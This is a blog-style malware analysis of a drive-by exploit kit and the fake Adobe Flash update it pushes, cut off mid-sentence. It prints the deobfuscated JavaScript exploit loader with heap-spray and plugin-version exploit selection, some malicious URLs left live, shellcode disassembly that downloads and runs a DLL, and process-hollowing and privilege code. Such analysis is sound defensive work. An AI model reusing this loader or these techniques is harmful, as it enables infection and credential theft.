To further detail, from h00p://brospecial.net/annihilates/index.html it opens with this text...
But in the background opens three java script sources.
<script type="text/javascript" src="http://www.lafabbricadelleidee.net/peppiest/comedienne.js"></script>
<script type="text/javascript" src="http://penwithian.co.uk/hyperventilate/sporran.js"></script>
<script type="text/javascript" src="http://www.kiviturizm.com/rationale/equalizing.js"></script>
h00p://www.lafabbricadelleidee.net/peppiest/comedienne.js and h00p://penwithian.co.uk/hyperventilate/sporran.js opens h00p://11.lamarianella.info/read/engineering_best.php while h00p://www.kiviturizm.com/rationale/equalizing.js opens h00p://11.laptopvspc.com/read/engineering_best.php by simply setting the document.location object.
engineering_best.php
All the scripts point to the result of this PHP page. The content returned in this page contains a self decrypting javascript code.
if(document.getElementsByTagName("div")[0].style.left===""){gg="getA";}qq="q";gg+="ttri";function cxz(){r=a[gg+"bu"+"te"](i);};qaz="getElem"+"entsB"+"yTagName";zaq="pa";</script><div id="q" 12=";1ikie;095nh;94895;375...A.VERY.LONG.ENCRYPTED.DATA....46eiq"></div><script>
a=document.getElementById(qq);
e=eval;
s="";
for(i=0;;i++){
cxz();
if(r){s=s+r;}else break;
}
a=zxv=s;
s="";
p=e(zaq+"rseInt");
for(i=0;i<a.length;i+=2){
if(a["sub"+"str"](i,1)==";")continue;
if(document[qaz]("d"+"iv")[0].style.left==="")s=s+String["fromCharCode"]((p(a["sub"+"str"](i,2),27)+100)/6);
}
c=s;
e(s);The decrypted java script results to...
var PluginDetect=
{
version:"0.7.9",name:"PluginDetect",handler:function(c,b,a)
{
.... LONG PluginDetect CODE ....
};
PluginDetect.initScript();
PluginDetect.getVersion(".");
var $$ = PluginDetect;
function x(s)
{
d=[];
for(i=0;i<s.length;i++)
{
k=(s.charCodeAt(i)).toString(33);
d.push(k);
};
return d.join(":");
}
end_redirect=function()
{
window.location.href='http://11.sephoracouponscode.com/adobe/';
};
function j1()
{
return false;
}
function j2()
{
return false;
}
function p1()
{
return false;
}
function p2()
{
return false;
}
function f1()
{
var oSpan=document.createElement("span");
document.body.appendChild(oSpan);
var url = "/read/engineering_best.php?gynwb=32:1k:32:1i:1g&aatwawb=3h:3l:38:38:33:37&fteu=2v:1h:1f:33:1m:1f:2v:1k:31:2w&info=02e67fbb1b70fa4a727caa615381613e3d73d9d5370a3436400595f7d0a2e22159e953d3984a6928056c5d9e1c022d7d28c7e56da4d8620bb24d8d8c7904786fe5";
oSpan.innerHTML="<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' id='asd' width='600' height='400' codebase='http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab'><param name='movie' value='"+url+"' /><embed src='"+url+"' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>";
}
function getCN()
{
return "/read/engineering_best.php?airiuzz=32:1k:32:1i:1g&abi=3f:3k:34:3h:35&aedzxmmw=2v:1h:1f:33:1m:1f:2v:1k:31:2w&deb=vlwp"
}
function getBlockSize()
{
return 1024
}
function getAllocSize()
{
return 1024*1024
}
function getAllocCount()
{
return 300
}
function getFillBytes()
{
var a='%u'+'0c0c';
return a+a
}
function getShellCode()
{
var a="8282!...LONG.SHELLCODE.DATA...%1414!%".split("").reverse().join("");
return a["replace"](/%!/g,"%"+"u")
};
function ff2()
{
var oSpan=document.createElement("span");
var url="/read/engineering_best.php?xtekiq=32:1k:32:1i:1g&uqphr=31:3b:3d:36&gpjxgrfu=2v:1h:1f:33:1m:1f:2v:1k:31:2w&gbgbyq=lfha";
oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='"+url+"' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed src='"+url+"' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'></embed></object>";
document.body.appendChild(oSpan);
}
document.write('');
setTimeout(end_redirect,61000);
var pdfver=[];
function svwrbew6436b($)
{
var ar = [];
var javax = ($.getVersion("Ja"+"va")+".").toString()["split"](".");
if ($.isMinVersion("Ja"+"va")>=0&&((javax[0]==1&&javax[1]==7&&javax[3]<9)))
{
ar["push"](j2); //false
}
else if($.isMinVersion("Ja"+"va")>=0&&((javax[0]==1&&javax[1]==6&&javax[3]<33)||(javax[0]==1&&javax[1]<6)))
{
ar["push"](j1); //false
}
pdfver=PluginDetect.getVersion("AdobeReader");
if(window.document)if(typeof pdfver=="string")
{
pdfver=pdfver["split"](".")
}
else
{
pdfver=[0,0,0,0]
}
if(pdfver[0]>0&&pdfver[0]<8)
{
if(window.document)ar["push"](p1); //false
}
if(window.document&&(pdfver[0]==8||(pdfver[0]==9&&pdfver[1]<4)))
{
ar["push"](p2); //false
}
var ver = ($$.getVersion("Flash")+".").toString()["split"](".");
if (
(
(ver[0]==10&&ver[1]==0&&ver[2]>40) // >10.0.40
||
(
window.document
&&
(ver[0]==10&&ver[1]>0) // >10.0
&&
(ver[0]==10&&ver[1]<2) // <10.2
)
)
||
(
window.document
&& (
(ver[0]==10&&ver[1]==2&&ver[2]<159) // <10.2.159
||
(ver[0]==10&&ver[1]<2) // <10.2
)
)
)
{
ar["push"](ff2);
}
if(
(ver[0]==10&&ver[1]==3&&ver[2]==181&&ver[3]<=23) // <10.3.181.24
||
(ver[0]==10&&ver[1]==3&&ver[2]<181) // <10.3.181
)
{
ar["push"](f1);
}
var arcalli=0;
var arcall = function()
{
if(ar.length<=arcalli)return 123;
ss=setTimeout;
var res=ar[arcalli]();
arcalli++;
if(res&&window.document)
{
ss(function()
{
arcall()
}
,5509);
}
else
{
arcall();
}
};
arcall();
}
$$["onDetec"+"tionDone"]("Ja"+"va", svwrbew6436b, "../treating/getJavaInfo.jar");
The code above has been edited as it was being debugged.
It uses the PluginDetect, a script module from http://www.pinlady.net/PluginDetect/ , a tool that can determine the currently installed versions of the operating system and selected applications such as IE, Chrome, Adobe flash, and PDF reader. With this tool at hand, the malicious script below the PluginDetect script would then be able to select the exact exploit to execute.
However, in this specific malware script, the application involved is only Adobe Flash. If the version is within 10.0 to 10.2.159, it opens the page
/read/engineering_best.php?xtekiq=32:1k:32:1i:1g&uqphr=31:3b:3d:36&gpjxgrfu=2v:1h:1f:33:1m:1f:2v:1k:31:2w&gbgbyq=lfha
. Then if the version is below 10.3.181.24, it opens
/read/engineering_best.php?gynwb=32:1k:32:1i:1g&aatwawb=3h:3l:38:38:33:37&fteu=2v:1h:1f:33:1m:1f:2v:1k:31:2w&info=02e67fbb1b70fa4a727caa615381613e3d73d9d5370a3436400595f7d0a2e22159e953d3984a6928056c5d9e1c022d7d28c7e56da4d8620bb24d8d8c7904786fe5
. Either of these are opened in h00p://11.lamarianella.info or h00p://11.laptopvspc.com domain. What is expected here is that it will download SWF files, most likely exploited SWFs that would trigger the shell code by the getShellCode() function. At the time of this writing the SWFs cannot be downloaded anymore.
In any event, the script still is opens h00p://11.sephoracouponscode.com/adobe/ using the default browser regardless of what PluginDetect retrieves from the system environment. This website contains a fake Adobe update site.
The site is a complete replica of the real Adobe site that lures users to download adobe_flash_player.exe , a fake update, actually a malware.
getShellCode()
The shellcode when converted to its binary form is 538 bytes. This code begins by decrypting, not decompressing, the rest of its code. A simple look at the decrypted dump shows a URL:
The code proceeds by locating the first link entry in the EPROCESS blocks, usually NTDLL.DLL . Proceeds by searching for the DWORD 0x0c330408b from the process' base address.
seg000:00000026 33 C0 xor eax, eax
seg000:00000028 64 8B 40 30 mov eax, fs:[eax+30h]
seg000:0000002C 8B 40 0C mov eax, [eax+0Ch]
seg000:0000002F 8B 70 1C mov esi, [eax+1Ch]
seg000:00000032 56 push esi
seg000:00000033 8B 76 08 mov esi, [esi+8]
seg000:00000036 33 DB xor ebx, ebx
seg000:00000038 66 8B 5E 3C mov bx, [esi+3Ch]
seg000:0000003C 03 74 33 2C add esi, [ebx+esi+2Ch]
seg000:00000040 81 EE 15 10 FF FF sub esi, 0FFFF1015h
seg000:00000046 B8 8B 40 30 C3 mov eax, 0C330408Bh
seg000:0000004B
seg000:0000004B loc_4B:
seg000:0000004B 46 inc esi
seg000:0000004C 39 06 cmp [esi], eax
seg000:0000004E 75 FB jnz short loc_4B
The DWORD value 0x0c330408b is actually equivalent to...
mov eax, [eax+30h]
retn
It uses this as a function to return the value pointed by eax and was used in retrieving API addresses from the export table of a loaded library. The APIs retrieved are:
seg000:00000189 8E 4E 0E EC dd 0EC0E4E8Eh ; LoadLibraryA
seg000:0000018D 98 FE 8A 0E dd 0E8AFE98h ; WinExec
seg000:00000191 89 6F 01 BD dd 0BD016F89h ; TerminateThread
seg000:00000195 33 CA 8A 5B dd 5B8ACA33h ; GetTempPathA
seg000:00000199 1B C6 46 79 dd 7946C61Bh ; VirtualProtect
seg000:0000019D 36 1A 2F 70 dd 702F1A36h ; URLDownloadToFileA
And the final step it does is to download and execute a DLL file.
seg000:0000014C 6A 00 push 0
seg000:0000014E 6A 00 push 0
seg000:00000150 53 push ebx ; C:DOCUME~1ADMINI~1LOCALS~1Tempwpbt0.dll
seg000:00000151 57 push edi ; "http://11.lamarianella.info/read/engineering_best.php?kf=32:1k:32:1i:1g&ue=2v:1h:1f:33:1m:1f:2v:1k:31:2w&v=1k&jb=z&ey=j"
seg000:00000152 6A 00 push 0
seg000:00000154 FF 56 14 call dword ptr [esi+14h] ; URLDownloadToFileA
seg000:00000157 85 C0 test eax, eax
seg000:00000159 75 16 jnz short notdownloaded
seg000:0000015B 6A 00 push 0
seg000:0000015D 53 push ebx ; C:DOCUME~1ADMINI~1LOCALS~1Tempwpbt0.dll
seg000:0000015E FF 56 04 call dword ptr [esi+4] ; WinExec
seg000:00000161 6A 00 push 0
seg000:00000163 83 EB 0C sub ebx, 0Ch
seg000:00000166 53 push ebx ; regsvr32 -s C:DOCUME~1ADMINI~1LOCALS~1Tempwpbt0.dll
seg000:00000167 FF 56 04 call dword ptr [esi+4] ; WinExec
As of this writing, URL that retrieves wpbt0.dll doesn't exist anymore.
adobe_flash_player.exe
First thing it does is verify that the IOleContainer COM interface exits. This malware requires this interface for it to be able to use global streams later. The malware does this by checking out the existence of this registry key:
HKEY_LOCAL_MACHINESOFTWAREClassesInterface{0000011b-0000-0000-c000-000000000046}Further, this key is also checks for its marker:
HKEY_LOCAL_MACHINESOFTWAREClassesInterface{0000011b-0000-0000-c000-000000000046}11This registry key serves as a placeholder where it could possibly store malware information later.
This malware allocates a memory space of 0x019000 , then decrypts a large data over this space. Afterwards, directly passes control to decrypted code. Here's how it passed control:
.text:0040180D mov ecx, ALLOCATED_MEM_BASE
.text:00401813 add ecx, 17AD0h
.text:00401819 mov NEW_EIP, ecx
.text:0040181F mov eax, eax
.text:00401821 mov eax, eax
.text:00401823 mov eax, eax
.text:00401825 popa
.text:00401826 mov eax, eax
.text:00401828 mov eax, eax
.text:0040182A mov eax, eax
.text:0040182C mov eax, eax
.text:0040182E push 368282h
.text:00401833 mov eax, [ebp+offset_CALL_EAX_FUNC]
.text:00401836 mov eax, eax
.text:00401838 mov eax, eax
.text:0040183A mov ecx, esp ; Replace TOS
.text:0040183C push edx
.text:0040183D mov edx, ecx
.text:0040183F sub edx, 26h
.text:00401842 mov ecx, edx
.text:00401844 pop edx
.text:00401845 add ecx, 22h
.text:00401848 mov eax, eax
.text:0040184A mov eax, eax
.text:0040184C mov eax, eax
.text:0040184E mov dword ptr [ecx+4], 0 ; Clear TOS
.text:00401855 mov eax, eax
.text:00401857 mov eax, eax
.text:00401859 mov eax, eax
.text:0040185B add [ecx+4], eax ; Set TOS with value of EAX
.text:0040185E mov eax, eax
.text:00401860 retn
Then after retn ...
.text:00401490 CALL_EAX_FUNC proc near ; CODE XREF: sub_4014C0+13C p
.text:00401490 ; sub_4014C0+156 p
.text:00401490 ; DATA XREF: sub_4014C0+C o
.text:00401490 ; sub_4014C0+2CF o
.text:00401490 push ebp
.text:00401491 mov ebp, esp
.text:00401493 mov eax, eax
.text:00401495 mov eax, eax
.text:00401497 mov eax, eax
.text:00401499 mov esp, EXECUTE_ADDRESS_1_ESP
.text:0040149F mov eax, eax
.text:004014A1 mov eax, eax
.text:004014A3 mov eax, eax
.text:004014A5 add esp, 4
.text:004014A8 mov eax, eax
.text:004014AA mov eax, eax
.text:004014AC mov eax, eax
.text:004014AE mov eax, NEW_EIP
.text:004014B3 mov eax, eax
.text:004014B5 mov eax, eax
.text:004014B7 push eax
.text:004014B8 retn
.text:004014B8 CALL_EAX_FUNC endp
Beam us up to memory space, Scottie!
Now in the virtual allocated space, execution continues by allocating another space withHeapAlloc . It decrypts another data into this new space which turns out that the decrypted data is a PE file. Using the import table information from this new PE's header, it loads all the required libraries and the APIs it will use.
It also calls UnmapViewOfFile with the current running process as its parameter.
seg000:002978C5 68 14 03 28 00 push offset aUnmapviewoffil ; "UnmapViewOfFile"
seg000:002978CA A1 48 7D 29 00 mov eax, ds:hKernelProcess
seg000:002978CF 50 push eax
seg000:002978D0 E8 4B FB FF FF call _GetProcAddress
seg000:002978D5 83 C4 08 add esp, 8
seg000:002978D8 89 45 DC mov [ebp+var_24], eax
seg000:002978DB 83 3D 44 7D 29 00 00 cmp ds:bSUCCESS, 0
seg000:002978E2 75 0A jnz short loc_2978EE
seg000:002978E4 8B 0D 3C 7D 29 00 mov ecx, ds:hThisProcess ; our calling process PE at base 0x400000
seg000:002978EA 51 push ecx
seg000:002978EB FF 55 DC call [ebp+var_24] ; UnmapViewOfFile
This is somehow an Anti-dumping technique. Every file that is executed has a mapped view in the process space. It can also be unmapped which also happens when a process is in the process of termination. Here's a reading from Microsoft (http://msdn.microsoft.com/en-us/library/windows/desktop/aa366882(v=vs.85).aspx):
Unmapping a mapped view of a file invalidates the range occupied by the view in the address space of the process and makes the range available for other allocations. It removes the working set entry for each unmapped virtual page that was part of the working set of the process and reduces the working set size of the process. It also decrements the share count of the corresponding physical page.
Since the original malware process has already transferred code control to the allocated memory space, it can successfully achieve un-mapping. Un-mapping also means clearing and freeing up the process space and thus, nothing can be dumped from that area. But in this case, the malware simply removed the process space but references to this process space still exists from the Process Environment Block (PEB).
What happens next is a call to VirtualAlloc requesting a base address stated in the header of the newly decrypted PE file. Since the base address here is 0x0400000 which is the same as that from the un-mapped process, the memory allocation results to success.
seg000:002978F7 6A 40 push 40h
seg000:002978F9 68 00 30 00 00 push 3000h
seg000:002978FE 8B 55 FC mov edx, [ebp+var_4]
seg000:00297901 52 push edx
seg000:00297902 8B 45 E0 mov eax, [ebp+var_20]
seg000:00297905 8B 48 34 mov ecx, [eax+34h]
seg000:00297908 51 push ecx
seg000:00297909 FF 55 F0 call [ebp+VirtualAllocAddress] ; Results creating base 400000
It follows copying the decrypted PE to the new allocated process space, but at the same time mapping the PE file based on the information stated in PE's section headers.
seg000:0029784B 8B 45 F4 mov eax, [ebp+var_C]
seg000:0029784E 83 C0 01 add eax, 1
seg000:00297851 89 45 F4 mov [ebp+var_C], eax
seg000:00297854 loc_297854:
seg000:00297854 8B 4D E0 mov ecx, [ebp+var_20]
seg000:00297857 0F B7 51 06 movzx edx, word ptr [ecx+6]
seg000:0029785B 39 55 F4 cmp [ebp+var_C], edx
seg000:0029785E 73 59 jnb short loc_2978B9
seg000:00297860 8B 45 E8 mov eax, [ebp+var_18]
seg000:00297863 83 78 14 00 cmp dword ptr [eax+14h], 0
seg000:00297867 74 45 jz short loc_2978AE
seg000:00297869 8B 4D E8 mov ecx, [ebp+var_18]
seg000:0029786C 83 79 10 00 cmp dword ptr [ecx+10h], 0
seg000:00297870 74 3C jz short loc_2978AE
seg000:00297872 8B 55 E8 mov edx, [ebp+var_18]
seg000:00297875 8B 42 10 mov eax, [edx+10h]
seg000:00297878 8B 4D E0 mov ecx, [ebp+var_20]
seg000:0029787B 8B 51 3C mov edx, [ecx+3Ch]
seg000:0029787E 8D 44 10 FF lea eax, [eax+edx-1]
seg000:00297882 8B 4D E0 mov ecx, [ebp+var_20]
seg000:00297885 33 D2 xor edx, edx
seg000:00297887 F7 71 3C div dword ptr [ecx+3Ch]
seg000:0029788A 8B 55 E0 mov edx, [ebp+var_20]
seg000:0029788D 0F AF 42 3C imul eax, [edx+3Ch]
seg000:00297891 50 push eax
seg000:00297892 8B 45 E8 mov eax, [ebp+var_18]
seg000:00297895 8B 4D 08 mov ecx, [ebp+arg_0]
seg000:00297898 03 48 14 add ecx, [eax+14h]
seg000:0029789B 51 push ecx
seg000:0029789C 8B 55 E8 mov edx, [ebp+var_18]
seg000:0029789F 8B 45 E4 mov eax, [ebp+var_1C]
seg000:002978A2 03 42 0C add eax, [edx+0Ch]
seg000:002978A5 50 push eax
seg000:002978A6 E8 15 FE FF FF call _memcpy
seg000:002978AB 83 C4 0C add esp, 0Ch
seg000:002978AE loc_2978AE:
seg000:002978AE 8B 4D E8 mov ecx, [ebp+var_18]
seg000:002978B1 83 C1 28 add ecx, 28h
seg000:002978B4 89 4D E8 mov [ebp+var_18], ecx
seg000:002978B7 EB 92 jmp short loc_29784B
Once the copy is done, it patches the PEB with the new PE entry point and image base:
seg000:00297726 A1 5C 7D 29 00 mov eax, ds:_TIB
seg000:0029772B 8B D2 mov edx, edx
seg000:0029772D 33 C9 xor ecx, ecx
seg000:0029772F db 3Eh
seg000:0029772F 3E 8B 40 30 mov eax, [eax+30h]
seg000:00297733 8B D2 mov edx, edx
seg000:00297735 8B D2 mov edx, edx
seg000:00297737 db 3Eh
seg000:00297737 3E 8B 48 0C mov ecx, [eax+0Ch]
seg000:0029773B 8B D2 mov edx, edx
seg000:0029773D 89 4D F4 mov [ebp+var_C], ecx
seg000:00297740 8B 45 F4 mov eax, [ebp+var_C]
seg000:00297743 8B 48 0C mov ecx, [eax+0Ch] ; +0x00c InLoadOrderModuleList
seg000:00297746 89 4D F8 mov [ebp+var_8], ecx
seg000:00297749 8B 55 F8 mov edx, [ebp+var_8]
seg000:0029774C 89 55 FC mov [ebp+var_4], edx
seg000:0029774F
seg000:0029774F loc_29774F:
seg000:0029774F B8 01 00 00 00 mov eax, 1
seg000:00297754 85 C0 test eax, eax
seg000:00297756 74 44 jz short loc_29779C
seg000:00297758 83 7D F8 00 cmp [ebp+var_8], 0
seg000:0029775C 75 04 jnz short loc_297762
seg000:0029775E 33 C0 xor eax, eax
seg000:00297760 EB 3C jmp short loc_29779E
seg000:00297762 loc_297762:
seg000:00297762 8B 4D F8 mov ecx, [ebp+var_8]
seg000:00297765 8B 51 18 mov edx, [ecx+18h] ; Base Address
seg000:00297768 3B 55 08 cmp edx, [ebp+arg_0]
seg000:0029776B 75 19 jnz short loc_297786
seg000:0029776D 8B 45 F8 mov eax, [ebp+var_8]
seg000:00297770 8B 4D 0C mov ecx, [ebp+arg_4]
seg000:00297773 89 48 1C mov [eax+1Ch], ecx ; Entry Point
seg000:00297776 8B 55 F8 mov edx, [ebp+var_8]
seg000:00297779 8B 45 10 mov eax, [ebp+arg_8]
seg000:0029777C 89 42 18 mov [edx+18h], eax ; Base Address
The decrypted PE's entry point code also needs to be patched to work properly:
seg000:00297700 sub_297700 proc near
seg000:00297700 55 push ebp
seg000:00297701 8B EC mov ebp, esp
seg000:00297703 A1 68 7D 29 00 mov eax, ds:DecryptedPEEntryPoint
seg000:00297708 C6 00 68 mov byte ptr [eax], 68h
seg000:0029770B 8B 15 60 7D 29 00 mov edx, ds:EntryPoint
seg000:00297711 89 50 01 mov [eax+1], edx
seg000:00297714 B2 C3 mov dl, 0C3h
seg000:00297716 88 50 05 mov [eax+5], dl
seg000:00297719 5D pop ebp
seg000:0029771A C3 retn
seg000:0029771A sub_297700 endp
At this point, the PEB has only been updated with the entry point and the image base, however, the original file name and path were not touched at all. A blackbox dumping of the memory process would seem a different file from that of the originally executed file.
And another code control transfer:
seg000:00297CF1 E8 8A FD FF FF call Garbage
seg000:00297CF6 8B 15 60 7D 29 00 mov edx, ds:EntryPoint
seg000:00297CFC 52 push edx ; Run New program
seg000:00297CFD C3 retn
What just happened is that the malware's PE process was totally replaced by a new PE.
And now, the real malware behavior begins.
A whole new process
The main code routines of the malware...
- Initiate some stuff and set privileges
- An anti-emulation
- Steal credentials and send em'
- Download and execute more files
- Steal more... Windows credentials
- Send em'
- Delete self
The malware retrieves its required APIs from these libraries...
.text:00402530 push offset StgOpenStorage ; int
.text:00402535 push offset aOle32_dll_0 ; "ole32.dll"
.text:0040253A call sub_4024D6
.text:0040253F push offset CryptUnprotectData ; int
.text:00402544 push offset aCrypt32_dll ; "crypt32.dll"
.text:00402549 call sub_4024D6
.text:0040254E push offset AllocateAndInitializeSid ; int
.text:00402553 push offset aAdvapi32_dll_0 ; "advapi32.dll"
.text:00402558 call sub_4024D6
.text:0040255D push offset SHGetFolderPathA ; int
.text:00402562 push offset aShell32_dll_1 ; "shell32.dll"
.text:00402567 call sub_4024D6
.text:0040256C push offset NetApiBufferFree ; int
.text:00402571 push offset aNetapi32_dll ; "netapi32.dll"
.text:00402576 call sub_4024D6
.text:0040257B push offset WTSGetActiveConsoleSessionId ; int
.text:00402580 push offset aKernel32_dll_1 ; "kernel32.dll"
.text:00402585 call sub_4024D6
.text:0040258A push offset MsiGetComponentPathA ; int
.text:0040258F push offset aMsi_dll ; "msi.dll"
.text:00402594 call sub_4024D6
.text:00402599 push offset PStoreCreateInstance ; int
.text:0040259E push offset aPstorec_dll ; "pstorec.dll"
.text:004025A3 call sub_4024D6
.text:004025A8 push offset CreateEnvironmentBlock ; int
.text:004025AD push offset aUserenv_dll_0 ; "userenv.dll"
.text:004025B2 call sub_4024D6
.text:004025B7 retn
Notice that it loads ole32.dl l as expected from verifying IOleContainer in the registry where it uses this to push messages and data to a global stream. You can picture that this malware will be using streams to push and pull data.
Next is an anti-emulation technique. Emulators usually simulate the sequence of instructions but has limits. This particular looping technique is commonly employed by different malwares. What it does is try to break the instruction count limits of emulators.
.text:0040FAD2 mov ecx, ecx
.text:0040FAD4 push 123EA83h ; loop counter
.text:0040FAD9 mov ecx, ecx
.text:0040FADB pop [ebp+var_4]
.text:0040FADE mov edx, eax
.text:0040FAE0 jmp short loc_40FB06
.text:0040FAE2 loc_40FAE2:
.text:0040FAE2 mov edx, eax
.text:0040FAE4 mov ecx, ecx
.text:0040FAE6 add eax, esi
.text:0040FAE8 mov edx, eax
.text:0040FAEA mov ecx, ecx
.text:0040FAEC push eax
.text:0040FAED mov ecx, ecx
.text:0040FAEF mov edx, eax
.text:0040FAF1 call GetTickCount
.text:0040FAF6 mov ecx, ecx
.text:0040FAF8 pop eax
.text:0040FAF9 mov edx, eax
.text:0040FAFB mov ecx, ecx
.text:0040FAFD add eax, edx
.text:0040FAFF mov ecx, ecx
.text:0040FB01 mov edx, eax
.text:0040FB03 dec [ebp+var_4]
.text:0040FB06 loc_40FB06:
.text:0040FB06 cmp [ebp+var_4], 0
.text:0040FB0A jnz short loc_40FAE2
A good emulator should be intelligent enough to skip or mimic this kind of code.
It then adjusts the privilege level of the malware so it can act as if it has administrative privileges.
.text:004029AC push eax ; lpLuid
.text:004029AD push [ebp+lpName] ; lpName - "SeImpersonatePrivilege"
.text:004029B0 push 0 ; lpSystemName
.text:004029B2 call LookupPrivilegeValueA
.text:004029B8 or eax, eax
.text:004029BA jz short loc_402A17
.text:004029BC call GetCurrentProcess
.text:004029C1 mov edx, eax
.text:004029C3 lea eax, [ebp+hObject]
.text:004029C6 push eax ; TokenHandle
.text:004029C7 push TOKEN_ADJUST_PRIVILEGES ; DesiredAccess
.text:004029C9 push edx ; ProcessHandle
.text:004029CA call OpenProcessToken
.text:004029D0 or eax, eax
.text:004029D2 jz short loc_4029FD
.text:004029D4 mov [ebp+NewState.PrivilegeCount], 1
.text:004029DB push [ebp+Luid.LowPart]
.text:004029DE pop [ebp+NewState.Privileges.Luid.LowPart]
.text:004029E1 push [ebp+Luid.HighPart]
.text:004029E4 pop [ebp+NewState.Privileges.Luid.HighPart]
.text:004029E7 cmp [ebp+arg_4], 0
.text:004029EB jz short loc_4029F6
.text:004029ED mov [ebp+NewState.Privileges.Attributes], SE_PRIVILEGE_ENABLED
.text:004029F4 jmp short loc_4029FD
.text:004029F6 loc_4029F6:
.text:004029F6 mov [ebp+NewState.Privileges.Attributes], 0
.text:004029FD loc_4029FD:
.text:004029FD ; sub_402977+7D j
.text:004029FD push 0 ; ReturnLength
.text:004029FF push 0 ; PreviousState
.text:00402A01 push 10h ; BufferLength
.text:00402A03 lea eax, [ebp+NewState]
.text:00402A06 push eax ; NewState
.text:00402A07 push 0 ; DisableAllPrivileges
.text:00402A09 push [ebp+hObject] ; TokenHandle
.text:00402A0C call AdjustTokenPrivileges
.text:00402A12 or eax, eax
.text:00402A14 jz short loc_402A17
.text:00402A16 inc ebx
.text:00402A17 loc_402A17:
.text:00402A17 cmp [ebp+hObject], 0
.text:00402A1B jz short loc_402A25
.text:00402A1D push [ebp+hObject] ; hObject
.text:00402A20 call CloseHandle
The privilege level is set to SeImpersonatePrivilege to permit the malware program
No comments:
Post a Comment